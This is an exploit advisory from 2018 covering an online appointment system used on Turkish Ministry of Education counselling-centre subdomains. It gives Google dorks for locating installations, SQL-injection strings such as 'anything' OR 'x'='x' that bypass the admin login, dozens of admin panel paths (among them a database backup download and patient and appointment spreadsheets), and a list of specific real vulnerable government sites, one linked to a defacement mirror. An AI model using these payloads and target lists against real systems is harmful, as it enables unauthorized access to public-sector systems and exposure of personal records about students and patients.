##########################################################################################################
# Exploit Title : Webmaster Atom Bilgisayar Yazılım Danışmanllık Ministry of Education TR *.subdomains
RAM Online Appointment Atom Computers Unauthenticated Access Control Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 15/10/2018
# Vendor Homepage : atombilgisayar.com.tr
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork :
intext:''Webmaster Atom Bilgisayar Yazılım Danışmanllık'' site:meb.gov.tr
inurl:''/randevu/index.php?sayfa=rapor'' site:meb.gov.tr
inurl:''/randevu/index.php?sayfa=iletisim'' site:meb.gov.tr
# Exploit Risk : Medium
# CWE : CWE-287 - [ Improper Authentication ] - CWE-592 - [ Authentication Bypass Issues ] -
CWE-284 [ Improper Access Control ] + CWE-264 - [ Permissions, Privileges, and Access Controls ]
##########################################################################################################
# Webmaster Atom Computer Software Counselling Improper Access Control Vulnerability
# Admin Panel Login Path :
/randevu/admin/
/onlinerandevu/admin/
# Authentication Bypass Exploit :
Admin Username :
anything' OR 'x'='x
Admin Password :
anything' OR 'x'='x
You can try also this, too.
1' or 1=1 -- -
1' or 1=1 -- -
'=''or'
'=''or'
# Useable Admin Control Panel URL Links Exploits =>
/randevu/admin/index.php
/randevu/admin/index3.php
/randevu/admin/yedekal.php => SQL Database Backup Arbitrary File Download
/admin/randevu.xls
/onlinerandevu/admin/hasta.xls
/randevu/admin/sifre.php
/randevu/admin/resetle.php
/randevu/admin/index4.php
/randevu/admin/ogretmen.php
/randevu/admin/karar.php
/randevu/admin/egitsel.php
/randevu/admin/test.php
/randevu/admin/sebeb.php
/randevu/admin/tani.php
/randevu/admin/destek.php
/randevu/admin/oneri.php
/randevu/admin/index1.php
/randevu/admin/dr.php
/randevu/admin/saat.php
/randevu/admin/basvuru.php
/randevu/admin/sart.php
/randevu/admin/hastalik.php
/randevu/admin/site.php
/randevu/admin/ilce.php
/randevu/admin/okul.php
/randevu/admin/kademe.php
/randevu/admin/tatil.php
/randevu/admin/index5.php
/randevu/admin/randevu.php
/randevu/admin/liste.php
/randevu/admin/page1.php
/randevu/admin/rapor.php
/admin/admin.php?islem=randevu&randevu=listele
/admin/admin.php?islem=ogretmen
/admin/admin.php?islem=kullanici
/randevu/admin/admin.php?islem=tarih
/randevu/admin/admin.php?islem=saat
/randevu/admin/admin.php?islem=okul
/randevu/admin/admin.php?islem=randevu&randevu=dokum_ver
/randevu/admin/admin.php?islem=randevu&randevu=arsiv
/randevu/admin/admin.php?islem=randevu&randevu=reddedilen
/randevu/admin/admin.php?islem=randevu&randevu=rezerve
# Directory Paths =>
/randevu/index.php?sayfa=iletisim
/randevu/index.php?sayfa=iptal
/randevu/index.php?sayfa=sorgu
/randevu/index.php?sayfa=rapor
/randevu/index.php?sayfa=%F6gretmen%20giri%FEi
##########################################################################################################
Example Vulnerable Sites *.subdomains of meb.gov.tr =>
bucaram.meb.gov.tr/randevu/admin/ => [ Proof of Concept ] => zone-h.org/mirror/id/31762392
randevu.atombilgisayar.com.tr/admin/
fatsaram.meb.gov.tr/randevu/admin/
adiyamanram.meb.gov.tr/randevu/admin/
tavsanliram.meb.gov.tr/randevu/admin/
sokeram.meb.gov.tr/randevu/admin/
sancakteperam.meb.gov.tr/randevu/admin/
pendikram.meb.gov.tr/randevu/admin/
kilisram.meb.gov.tr/randevu/admin/
kcekmeceram.meb.gov.tr/randevu/admin/
esenlerram.meb.gov.tr/randevu/admin/
bakirkoyram.meb.gov.tr/randevu/admin/
bahcelievlerram.meb.gov.tr/randevu/admin/
arnavutkoyram.meb.gov.tr/randevu/admin/
boluram.meb.gov.tr/randevu/admin/
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
